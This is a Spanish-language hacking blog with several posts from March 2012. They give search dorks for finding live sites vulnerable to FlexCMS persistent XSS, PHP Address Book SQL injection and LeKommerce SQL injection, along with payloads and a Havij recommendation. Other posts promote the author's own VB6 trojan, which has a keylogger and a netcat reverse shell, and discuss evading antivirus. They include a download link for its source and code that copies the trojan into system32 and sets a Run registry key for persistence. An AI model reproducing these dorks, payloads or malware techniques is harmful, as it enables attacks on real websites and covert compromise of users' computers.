sábado, 17 de marzo de 2012

XSS Persistente en FlexCMS 3.2.1


Ayer exploit-db publicó una vuln en CMS flex anterior a la versión 3.2.1


XSS persistente?


Si, hasta ahora habíamos visto XSS inyectando por la URL o por las cookies, pero el persistente se queda guardado! Es decir, podemos editar la pagina donde este la vuln y cualquiera que entre la vera. Vamos a verlo:


Para esta vuln he echo un pequeño dork, ya que en exploit-db no salía ninguno:


"Powered By FlexCMS" inurl:index.php/register.html


Tendremos una página como esta le daremos a registration:






Nos registramos y una vez registrados nos loggeamos:




Ahora le daremos a Edit Profile y en display name pondremos nuestro XSS <script>alert(/hacked/)</script>:



Le damos a guardar y ya esta cada vez que alguien entre en la página verá esto:


Como somos hackers éticos nos ponemos en contacto con el admin:




Si queréis mas info (aunque no la hay XD) aquí esta exploit-db:


http://www.exploit-db.com/exploits/18608/ 




Salu2 anónimo

sábado, 10 de marzo de 2012


TR0j4neo detectado por el avast?


Hoy como de costumbre me he puesto a trabajar con el TR0j4neo he agregado un par de cosas mas como captura de pantalla y ejecutar archivos. Pero el caso es que la versión que publiqué el otro día la 5.6 estaba detectada por mi avast! Porque? si hace un par de días no lo detectaba! Lo vi claro, cuando lo subí a virustotal se quedó en una base de datos y el avast lo cogió. El caso es que he compilado la nueva versión, con los cambios que he echo y no lo detecta, esta claro que no hay que subirlo a virustotal. 


He reanalizado la v5.6 y ahora lo detectan 16/43, cuatro mas que antes. Entre ellos el avast y el McAfee


https://www.virustotal.com/file/eadd0389aafc49025d7a2153d50882051eba5504cce33aeb49ac90c06caf3a43/analysis/1331402288/
PHP Address Book 6.2.12 Multiple security vulnerabilities




Hoy Stefan Schurtz publica en exploit-db una serie de vulnerabilidades en el PHP adress book 6.2.12.


Las vulnerabilidades son SQLi y XSS.







SQL-Injection:
http://[target]/addressbook/edit.php?id=[sql-injection]
http://[target]/addressbook/vcard.php?id=[sql-injection]






XSS:


http://[target]/addressbook/preferences.php?from=XSS
http://[target]/addressbook/index.php?group=XSS


D0rks:


inurl:addressbook/vcard.php?id=


inurl:addressbook/edit.php?id=

jueves, 8 de marzo de 2012

SQLI Online Shop LeKommerce


El pasado 4 de marzo exploit-db publicó un SQli que me pareció bastante interesante ya que habían un gran numero de páginas vulnerables, aquí va el dork:

inurl:secc.php?id=


Funciona perfectamente con Havij 

Y una de las cosas mas interesantes que he visto es que las contraseñas no están en MD5, es decir, no están protegidas!

Sin duda hay que darle un gran aplauso al creador!




Mas info del SQLi:




TR0j4neo v5.6 source code vb



Bueno últimamente he estado trabajando en un troyano en visual basic 6. Me dio bastantes problemas a la hora de realizar las conexiones pero aquí esta:








De momento tiene pocas funciones, poco poco iré añadiendo mas:


-Abrir CD 
-Cerrar CD
-Abrir Página (google.com)
-Mandar error
-Apagar pc
-Keylogger


Y la mas interesante


-Shell remota!!




Estuve mirando muchísimos tutoriales y información, pero al final di con la solución. Usé el sistema netcat para obtener la shell


Para todos los que no sepan lo que es aquí va un tuto:


http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html

El netcat se encuentra en la carpeta del servidor del troyano, cuando se ejecuta el trojan se copia el netcat en system32 y cada vez que en mi cliente le doy a shell remota el server abre ese netcat y se conecta a mi pc que estara en modo escucha. 


Vamos a verlo:








Una vez estemos conectados le daremos a shell remota:






Y ya estamos dentro! 


La pega es que de momento solo admite una conexión, esto ya lo iremos solucionando.


En cuanto a los antivirus es detectado por 11/43


No es detectado ni por Avast, ni por AVG, ni por McAfee, ni por Panda ni por NOD32.


Aquí los resultados en virustotal:


https://www.virustotal.com/file/eadd0389aafc49025d7a2153d50882051eba5504cce33aeb49ac90c06caf3a43/analysis/1331224288/

También tiene NO-ip, para que no tengas que abrirlo cada vez que pones el troyano, aunque aun esta en pruebas, no se si funciona del todo bien.


Bueno sin enrollarme mas aquí dejo el source code y los .exe que he compilado, ademas de un pequeño curso para troyanos en VB:




http://www.mediafire.com/?52qpigol82rsy3i




Nota:


Al servidor le faltan un par de cosas, como agregarse al registro para iniciarse con windows y copiarse en otra carpeta, también le falta que el netcat se copie en system32.


Aquí va el code que teneis que añadir (falta lo del netcat):





FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\system32\" & "ddlr32" & ".exe"




Shell ("cmd.exe /c Reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v ddlr32.exe /d C:\WINDOWS\system32\ddlr32.exe"), vbHide